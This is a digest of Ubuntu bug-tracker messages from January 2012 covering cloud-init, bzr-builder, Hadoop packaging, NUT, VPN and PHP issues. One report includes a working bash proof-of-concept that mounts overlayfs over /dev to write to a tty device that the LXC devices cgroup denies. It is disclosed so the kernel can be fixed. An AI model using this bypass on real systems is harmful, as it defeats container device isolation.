[Bug 615545] Re: Instances launched in a VPC cannot access ec2.archive.ubuntu.com

2012-01-13 Thread Scott Moser
I believe we talked once about doing the CNAME solution, and the
decision was made not to implement it. The reason was (from memory)
that if we did, all requests would then hit external mirrors, and
subsequently we would have to open up all traffic to the ec2 mirrors
that canonical IS is running. The decision was not to do that.

So, the other solution here is:
a.) SRU the fix in cloud-init to lucid
b.) wait until the s3 backed mirrors are live

B is expected inside of 30 days, and the SRU takes at least 2 weeks to get into
the archive.
We expect that s3 backed mirrors will be open to the world, so this will not be
a problem anymore.

[Bug 766242] Re: lp:ubuntu/cloud-init is not buildable by bzr-builder

2012-01-13 Thread Scott Moser
generally, i think that bzr-builder should be better, and allow for no
.pc directory but applied patches.

However, cloud-init's ubuntu trunk is now an upstream snapshot, so:
$ cat  cloud-init.recipe EOF
# bzr-builder format 0.4 deb-version {debupstream}-0ubuntu0+{revno}
lp:ubuntu/cloud-init
EOF
$ bzr dailydeb cloud-init.recipe working-dir

That worked for me today on precise, with, building '0.6.3~bzr502-0ubuntu1'
bzr-builder 0.7.2-0ubuntu1

using 'format 0.3' works also (so probably older bzr-builders would
work).

[Bug 915941] [NEW] overlayfs does not honor lxc-related permissions

2012-01-13 Thread Gary Poster
Public bug reported:

Using overlayfs with lxc causes tty problems that can kill X. Overlayfs
needs to honor the necessary cgroup permission calls, per the following
information from Serge.

here is a script which you can use to test the overlayfs
issue:

= exploit-overlayfs-devices.sh ===
#!/bin/bash

ddir=`cat /proc/self/mountinfo | grep cgroup | grep devices | awk '{ print $5
}'`
if [ x$ddir = x ]; then
echo couldn't find devices cgroup mountpoint
exit 1
fi

# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-`

# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-`

# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`

mount -t overlayfs -oupperdir=$udir,lowerdir=/dev none $odir
echo $$ $ndir/tasks
# deny all device actions
echo a $ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable
# overlay
echo c 4:5 m $ndir/devices.allow
echo devices.list: XXX
cat $ndir/devices.list
echo

# try writing to /dev/tty5 - not allowed
echo x /dev/tty5
echo write to /dev/tty5 returned $?

# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y $odir/tty5
echo write to $odir/tty5 returned $?

umount $odir
rmdir $odir
rm -rf $udir

# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ $ddir/tasks
rmdir $ndir
= exploit-overlayfs-devices.sh ===

The write to /dev/tty5 will fail, but the write to $odir/tty5 will
succeed.

fs/overlayfs/inode.c calls generic_permission, but it needs to do more
of what fs/namei.c:inode_permission() does, in particular the calls to
devcgroup_inode_permission() and security_inode_permission().

[Blueprint servercloud-p-hdp-hadoop] Ubuntu Server HDP Hadoop

2012-01-13 Thread James Page
Blueprint changed by James Page:

Whiteboard changed:
  Target versions of Hadoop components:

  hadoop-0.20.205.0
  hcatalog-0.2.0
  pig-0.9.0
  hbase-0.90.4
hive-0.7.1 # the script I got from Hortonworks labels this as hive-0.7.1+
which includes fixes to hive. - Yes - we might need to look at that - we should
be able to overlay the fixes if need be without rebuilding the entire project
  zookeeper-3.3.2
Q: Their website indicates they will use ambari as something
devops/juju-like. Clearly we want to use juju but have they made any ambari
assumptions?
A: No idea - one to ask Matt

  Package naming:

  hdp-hadoop
  hdp-hcatalog
  hdp-pig
  hdp-hbase
  hdp-hive
  hdp-zookeeper
  * The hdp prefix comes from Hortonworks terminology: Hortonworks Data
Platform (though they are obviously reinforcing connectedness to hadoop itself.)

  Assumptions:

Packaging will use bigtop as a base.
   - reuse of control file structure will help support bigtop packages in juju
charms as and when they support precise.
Java will NOT be rebuilt during the package build process.
Native libraries will be rebuilt during the package build process.
Q: What does this mean for the hive embedded in hcatalog (via
hcatalog-0.2.0/hive/external)? I'm guessing we just use the hdp-hive package we
create.
Patches may be required for native build components.
Debconf configuration in packages is useful for Juju charms and should be
applied where appropriate.
--- Debconf currently in use: namenode, jobtracker and hdfs_dir
Binary distributions will be used from upstream (no source build by default).
Q: Exactly what does this mean in this context? Binary distributions of ...
Are these the jar files inside the hortonworks/apache source (e.g.
./hive-0.7.1+/lib/javaewah-0.3.jar?
A: So most of the apache projects ship a binary distribution tarball which
includes all of the compile Java etc so we should not build from source - just
re-use these jars etc...

  Challenges:

hcatalog not packaged in bigtop trunk (need to check branches)
  JAVA_HOME and use of openjdk-6/7? JAVA_HOME detection - bigtop use a
specific package for this (bigtop-utils) which tries to guess - might be worth
re-using.
java-package as recommended approach to re-packaging Oracle java for Ubuntu
(generates Debian packaging from upstream binary distro).
Kerberos security - probably actually needs to be a charm configuration
option to secure a cluster.
Q: For Kerberos, do we have the necessary dependencies to get this done? If
so, I can do the charm work.j
Q: Re: Kerberos. We may need to really look into this as this will end up
affecting not only hadoop but, all of the other parts ( hive, pig, etc. ) as
well. This can really complicate the packaging/charming as well so, we may not
have time to get it all done in this cycle. Just my thoughts.
MultiArch native libraries in hdp-hadoop package - should not must.
Hive contains patches for hcatalog support - we need to work these in somehow
(maybe a overlay to the binary re-distribution).

  hcatalog:
External dependency on mysql-connector? and maybe mysql?
No binary distribution - only source so will need to be built locally to
produce release tarbal.

2012-01-13 Thread Antonio Rosales
@Brandon, thanks for filing the bug report. To better understand the issue you
are seeing could you please confirm you have enabled VPN for VPS by following
docs such as:
http://wiki.vpslink.com/TUN/TAP_device_with_OpenVPN_or_Hamachi

Also page 69 on http://download.openvz.org/doc/OpenVZ-Users-Guide.pdf
may be helpful.

Additional VPN information specific to Ubuntu can be found at:
https://help.ubuntu.com/community/OpenVPN

If these links don't help can you detail how you set up your VPN
environment and how your config file (vpn.ovpn) looks.

-Thanks.

[Bug 915971] [NEW] New command guestmount

2012-01-13 Thread Michael Still
Public bug reported:

The latest nova-compute adds a new command which needs sudo privs:

2012-01-13 22:24:27,385 DEBUG nova.utils [-] Running cmd (subprocess):
sudo guestmount --rw -a /var/lib/nova/instances/instance-000c/disk
-m /dev/sda1 /tmp/tmpXrLkev from (pid=2743) execute /data/backups-
meta/linux/x220/data/src/openstack/nova/nova/utils.py:201

This command is not set up in /etc/sudoers.d/nova_sudoers, and therefore
my test instance prompts for the password. Interestingly I can't find
the command guestmount packaged anywhere, so I'm not sure what its meant
to be doing.

The code to call guestmount seems to have been around for a while, so
I'm not sure why this is only just coming up now. Perhaps I only just
noticed it.

I see that guestmount is packaged for precise, but not for oneiric.

[Bug 915985] [NEW] usbhid-ups regression (APC BE525-RS)

2012-01-13 Thread Dmitry Andreychuk
Public bug reported:

Ubuntu 11.10
nut 2.6.1-2ubuntu2
UPS model: APC Back-UPS ES 525 (BE525-RS)
driver: usbhid-ups

I get the following error approximately every 30 seconds:
usb 4-2: usbfs: USBDEVFS_CONTROL failed cmd usbhid-ups rqt 161 rq 1 len 2 ret
-75
The simalar error is described in the driver's known issues but increasing
pollinterval doesn't help - the interval between error messages just increases
accordingly.
I also noticed that battery.charge returned by upsc doesn't change when the UPS
is actually discharging. I called upsc, unplugged UPS and called upsc again
after a while: ups.status, battery.runtime and input.voltage reasonably changed
but battery.charge stayed at 100%. So maybe the retreiving of this variable is
working incorrectly.
Part of my ups.conf:
[be525]
  driver = usbhid-ups
  port = auto
  pollinterval = 60

Output for sudo /lib/nut/usbhid-ups -u nut -a be525 - is attached.

I've tested a few other versions and got this:
2.4.3-1ubuntu3.1 - ok
2.6.0-1ubuntu3 - ok
2.6.1-2ubuntu2 - error
2.6.2-1ubuntu1 - error
2.6.3 (upstream) - error. Actually I didn't manage to run daemon that I built
from source, so I ran just the driver and it reported the same error.

Looks like this problem appeared in v2.6.1.

Re: [Bug 915985] [NEW] usbhid-ups regression (APC BE525-RS)

2012-01-13 Thread Arnaud Quette
Hi Dmitry,

2012/1/13 Dmitry Andreychuk
 Public bug reported:

 Ubuntu 11.10
 nut 2.6.1-2ubuntu2
 UPS model: APC Back-UPS ES 525 (BE525-RS)
 driver: usbhid-ups

I get the following error approximately every 30 seconds:

 again after a while: ups.status, battery.runtime and input.voltage reasonably
changed but battery.charge stayed at 100%. So maybe the retreiving of this
 variable is working incorrectly.

as per your provided log, both issues are related:
errno -75 is EOVERFLOW (Value too large for defined data type).

We can see 1 successful retrieval of battery. charge (HID path:
UPS.PowerSummary.RemainingCapacity, ReportID: 0x0c), obtained through
the interrupt pipe (ie, not requested explicitly, but sent by the
device itself, upon change)

All other request are failing, with EOVERFLOW, which should mean a
fault from the device (sending more data than it should

I've tested a few other versions and got this:
 2.4.3-1ubuntu3.1 - ok
 2.6.0-1ubuntu3 - ok
 2.6.1-2ubuntu2 - error
 2.6.2-1ubuntu1 - error
2.6.3 (upstream) - error. Actually I didn't manage to run daemon that I built
from source, so I ran just the driver and it reported the same error.

could you please send an output from a working version (preferably
2.6.0)?

cheers,
Arnaud

[Bug 908824] Re: Unable to connect to VPN as a non-admin user

2012-01-13 Thread Brandon Ingalls
I already have a tun device.
When I connect to the OpenVPN server I can see it receives an I.P.
tun0 Link encap:UNSPEC HWaddr
00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00

  RX bytes:39496 (39.4 KB) TX bytes:22557 (22.5 KB)
If I try to load a site like ipchicken as soon as I get the connected message
it will load but within seconds if I even try to ping google it will just hang
there and do nothing. If I try to go to any website firefox will just sit
loading the page.
I know this is not a problem within my network because if I use openVPN within
a XP virtual machine on my desktop (Same computer) It works just fine within
the vm for as long as the vm is on.

[Bug 869684] Re: 530 login incorrect error after upgrade to Oneiric

2012-01-13 Thread Steven Brown
I would like to throw my hat in the ring. I have the same issue after
upgrading to Oneiric. Is there a work around for this?

I tried symlinking the pam_shells.so file but it then fails with a
memory allocation error.

[Bug 916200] Re: missing kernel module ipmi_si module

2012-01-13 Thread Asif
Can't run apport-collect -p linux 916200, since w3m is not so visible on this
remote system through ssh.
Is there any other way I can upload that data? may be apport-bug
--save=/tmp/bugfile linux.

But I noticed another lucid 64bit lts server has the similar kernel's ipmi_si
module
and loaded fine. So 2.6.32-37-server's ipmi_si loads fine on another system.

But 2.6.32-37-generic's ipmi_si fails to load in this system.
The md5sum are different for the ipmi_si.ko

[Bug 615545] Re: Instances launched in a VPC cannot access ec2.archive.ubuntu.com

2012-01-13 Thread Eric Hammond
Scott:

- With the CNAME solution, the requests still go to the internal IP
address for standard EC2 instances.

- I don't imagine that many non-EC2 people would try to configure their
Ubuntu systems to use the EC2 repositories.

- Canonical would get charged the same network fees for people outside
of EC2 using the S3 solution as using the CNAME solution.

- The CNAME method only requires a change to entries in Canonical's DNS
servers, no action is required with SRUs and updates to AMIs.

The only objection I've heard that makes sense is a concern about the
risk of increase in cost from use by non-EC2 instances, but it sounds
like Canonical is already willing to take that risk with the S3
solution.

This decision doesn't affect me personally. It just seems CNAME is the
right approach and I'm not sure why it is not being adopted.

[Bug 910296] Re: Please backport the upstream patch to prevent attacks based on hash collisions

2012-01-13 Thread Ted Reed
You actually need two commits for this fix.

This one is the 5.3 branch commit for the first commit:

http://svn.php.net/viewvc?view=revisionrevision=321038

There was a fix to that commit later:

http://svn.php.net/viewvc?view=revisionrevision=321335

I've combined both of these patches into one patch that can be applied
to 5.3.2-1ubuntu4.11:

https://gist.github.com/1610477

Should just be able to drop it into debian/patches and add it to the end
of debian/patches/series.

I'm still confirming if that patch fixes the DoS.

Also, I might bump this up a little higher than medium. This is a
verified bug with trivially reproducible DoS capability.
